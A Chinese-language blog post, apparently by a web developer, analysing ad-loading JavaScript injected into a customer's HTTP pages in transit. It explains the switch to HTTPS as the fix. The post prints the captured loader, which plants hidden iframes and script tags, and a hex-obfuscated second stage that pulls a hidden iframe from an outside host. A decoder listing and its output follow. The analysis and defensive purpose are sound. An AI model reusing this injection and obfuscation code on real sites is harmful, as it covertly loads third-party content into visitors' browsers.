遭遇HTML被恶意注入JS弹广告,通过SSL证书学习及安装


 

起因

近期有客户反映界面错乱,本能地以为是缓存导致的,告知了清理缓存的方法,但操作后无效。远程查看后发现,客户浏览器收到的页面代码里突然多了一句

.js

好了,有线索就开始跟

// Entry point of the injected snippet, as captured from the tampered page.
// The global PinkFlag works as a run-once marker: the body runs only while typeof PinkFlag is 'undefined'.
// setTimeout is given a string, so 'pinka()' is evaluated as code after 500 ms.
// NOTE(review): the identifiers PinkFlag / pinka can serve as search strings when checking delivered HTML for this injection.
if (typeof(PinkFlag) == 'undefined') {var PinkFlag = 1;setTimeout('pinka()', 500)
}
/**
 * Loader step: walks two lists and hands every entry to an injector.
 * ifm (entries go to pinkb) is empty in this capture; jsl (entries go to pinkc) holds the single path "/zds31/1.js".
 * When document.body is still null it schedules the string 'pinkLoad()' after 500 ms and returns.
 * NOTE(review): no pinkLoad is defined in the captured snippet (this function is named pinka), so that retry would presumably fail — confirm against a complete capture.
 * NOTE(review): "/zds31/1.js" is root-relative, so the browser requests it from the visited site's own origin; presumably the same on-path device answers that request — confirm with a packet capture.
 */
function pinka() {var ifm = [];var jsl = [];var i = 0;jsl[0] = "/zds31/1.js";if (document.body == null) {setTimeout('pinkLoad()', 500);return}for (i = 0; i < ifm.length; i++) {pinkb(ifm[i])}for (i = 0; i < jsl.length; i++) {pinkc(jsl[i])}
}
/**
 * Appends an invisible iframe pointing at `url` to document.body.
 * The frame is sized 0x0 through both attributes and inline style, and additionally set to display:none.
 * NOTE(review): `ateElement` looks truncated by the page extraction (presumably document.createElement) — confirm against the raw capture.
 * @param {string} url - address assigned to the iframe's src attribute
 */
function pinkb(url) {var ifm = ateElement('iframe');ifm.setAttribute('src', url);ifm.setAttribute('width', 0);ifm.setAttribute('height', 0);ifm.setAttribute('frameborder', 0, 0);ifm.style.width = 0;ifm.style.height = 0;ifm.style.display = 'none';document.body.appendChild(ifm)
}
/**
 * Appends a <script> element with src = `url` to document.body, which makes the browser fetch and run that file.
 * NOTE(review): `ateElement` and the bare `pe = 'text/javascript'` look truncated by the page extraction
 * (presumably document.createElement and sobj.type) — confirm against the raw capture.
 * @param {string} url - address assigned to the script's src
 */
function pinkc(url) {var sobj = ateElement('script');pe = 'text/javascript';sobj.src = url;document.body.appendChild(sobj)
};

跟进/zds31/1.js 

/**
 * Second-stage helper: returns a random base-36 string of the requested length.
 * Property names are written as hex-escaped string keys; the backslashes appear to have been lost when the
 * page was extracted ("x6c..." was presumably "\x6c..."). Per the decoded list further down the page the keys
 * used here are length, Math, random, toString and substr.
 * The for-loop keeps appending Math.random().toString(36).substr(2) until the string is long enough,
 * then the result is cut to exactly the requested length.
 * @param {number} MmKKw$JlX1 - desired length of the returned string
 * @returns {string} the generated string
 */
function generateRandomAlphaNum(MmKKw$JlX1) {let rdmString = "";for (; rdmString["x6cx65x6ex67x74x68"] < MmKKw$JlX1; rdmString += window["x4dx61x74x68"]["x72x61x6ex64x6fx6d"]()["x74x6fx53x74x72x69x6ex67"](36)["x73x75x62x73x74x72"](2));return rdmString["x73x75x62x73x74x72"](0, MmKKw$JlX1);
}
/**
 * Second-stage injector: wraps an iframe in a hidden container and attaches it to the page.
 * With the hex-escaped keys decoded (see the decoded list further down the page) the steps are:
 * document.createElement("div"), style.display = "none", setAttribute("id", <6 random characters>),
 * document.createElement("iframe") with src set to the argument, then appendChild of the iframe into the
 * div and of the div into document.body.
 * NOTE(review): the id comes from generateRandomAlphaNum(6), so it is presumably different on every load
 * and not a stable indicator; the hidden div > iframe structure and the iframe src are what can be matched.
 * @param {string} mrsC$gj2 - address assigned to the iframe's src
 * @returns {HTMLElement} the hidden container div
 */
function iframe(mrsC$gj2) {let iframe_code = window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]("x64x69x76");iframe_code["x73x74x79x6cx65"]["x64x69x73x70x6cx61x79"] = "x6ex6fx6ex65";iframe_code["x73x65x74x41x74x74x72x69x62x75x74x65"]("x69x64", generateRandomAlphaNum(6));let ifr = window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]("x69x66x72x61x6dx65");ifr["x73x72x63"] = mrsC$gj2;iframe_code["x61x70x70x65x6ex64x43x68x69x6cx64"](ifr);window["x64x6fx63x75x6dx65x6ex74"]["x62x6fx64x79"]["x61x70x70x65x6ex64x43x68x69x6cx64"](iframe_code);return iframe_code;
}
// Immediately loads the next stage in a hidden iframe. Read as hex escapes, the literal decodes to
// hxxps://qw3[.]xxffmm[.]top/zds31/index.html (defanged here); the decoded list further down the page shows
// only the /zds31/index.html part. The host name is the network indicator to look for in proxy or DNS logs.
iframe('x68x74x74x70x73x3ax2fx2fx71x77x33x2ex78x78x66x66x6dx6dx2ex74x6fx70x2fx7ax64x73x33x31x2fx69x6ex64x65x78x2ex68x74x6dx6c');

跟进,居然还对JS做了“加密”(严格来说是十六进制转义的混淆,并不是真正的加密),跳转了一次之后又混淆了一层,只能手工解码


<!--
  Analyst helper page: prints every entry of the string table _0xb200 (copied from the obfuscated script)
  together with its index into the #context div, so the hex-escaped names become readable.
  NOTE(review): `var x&#ElementById("context")` looks damaged by the page extraction (presumably
  `var x = document.getElementById("context");`), and the "x6c..." entries have presumably lost their
  backslashes ("\x6c..."), so the listing will not run as shown.
  NOTE(review): the loop writes the decoded values through innerHTML. These strings come from a hostile
  script, so a decoder like this is safer when it writes them with textContent (or into a <pre>), so that a
  value is never parsed as markup in the analyst's browser.
-->
<html>
<head></head>
<body>
<div id="context"></div>
<script type="text/javascript">var x&#ElementById("context")var _0xb200=["x6cx65x6ex67x74x68","x4dx61x74x68","x72x61x6ex64x6fx6d","x74x6fx53x74x72x69x6ex67","x73x75x62x73x74x72","x73x75x62x73x74x72","x64x6fx63x75x6dx65x6ex74","x63x72x65x61x74x65x45x6cx65x6dx65x6ex74","x64x69x76","x73x74x79x6cx65","x64x69x73x70x6cx61x79","x6ex6fx6ex65","x73x65x74x41x74x74x72x69x62x75x74x65","x69x64","x64x6fx63x75x6dx65x6ex74","x63x72x65x61x74x65x45x6cx65x6dx65x6ex74","x69x66x72x61x6dx65","x73x72x63","x61x70x70x65x6ex64x43x68x69x6cx64","x64x6fx63x75x6dx65x6ex74","x62x6fx64x79","x61x70x70x65x6ex64x43x68x69x6cx64","x64x6fx63x75x6dx65x6ex74","x62x6fx64x79","x61x70x70x65x6ex64x43x68x69x6cx64","x68x74x74x70x73x3ax2fx2fx71x77x33x2ex78x78x66x66x6dx6dx2ex74x6fx70x2fx7ax64x73x33x31x2fx69x6ex64x65x78x2ex68x74x6dx6c"	];for(var i =0; i < _0xb200.length; i++){//alert(i +': '+ _0xb200[i]);x.innerHTML += i +': '+ _0xb200[i]+'<br/>';}</script>
</body>
</html>

 跟进输出结果

0: length
1: Math
2: random
3: toString
4: substr
5: substr
6: document
7: createElement
8: div
9: style
10: display
11: none
12: setAttribute
13: id
14: document
15: createElement
16: iframe
17: src
18: appendChild
19: document
20: body
21: appendChild
22: document
23: body
24: appendChild
25: /zds31/index.html

 继续跟进/zds31/index.html

最终是空白页,按照以往遇到的情况,肯定还是广告信息,但是查看源代码也没有加载信息,估计坏人正在升级系统.

 分析

通过本地网络和手机4G网络访问网站都没有问题,说明服务器上的页面本身没有被改动;问题只能出在客户一侧:客户路由器或者客户网络运营商在传输途中劫持并篡改了 http 数据(http 是明文传输,没有完整性校验,途中任何设备都可以往响应里插入内容),或者是有意为之。归根结底是为了投放广告获利!

网络上也有很多处理方式,但需要程序员根据自己的开发环境和业务进行选择。对于我目前面临的情况,最终我选择了 https 解决方案。需要注意,https 只能防止内容在传输途中被篡改;如果注入发生在服务器或者客户终端本身,还需要另行排查。

其他朋友可以参考这位博主的类似遭遇(转载):.html

 

HTTPS SSL学习

HTTP和HTTPS协议(转载):

阿里云SSL介绍(转载):.html?spm=5176.2020520163.0.0.2f36zQKGzQKGRT

安装参考(转载):

实践思考

1.http转https的原因

2.升级的范围

3.适合的证书

4.可能会遇到的问题

4.1 目前程序的调整

4.2 外部站点链接

4.3 支付站点配置

4.4 参考:=1610926136668434854&wfr=spider&for=pc

5.未来的证书升级操作

 

注意:需要把网站所有 js、css 等外部素材的引用改为动态引用,即无论通过 http 还是 https 访问,获取素材时使用的都是当前页面的协议。否则 https 页面里残留的 http 引用会被浏览器当作混合内容拦截,而且这些素材在传输途中仍然可能被篡改。
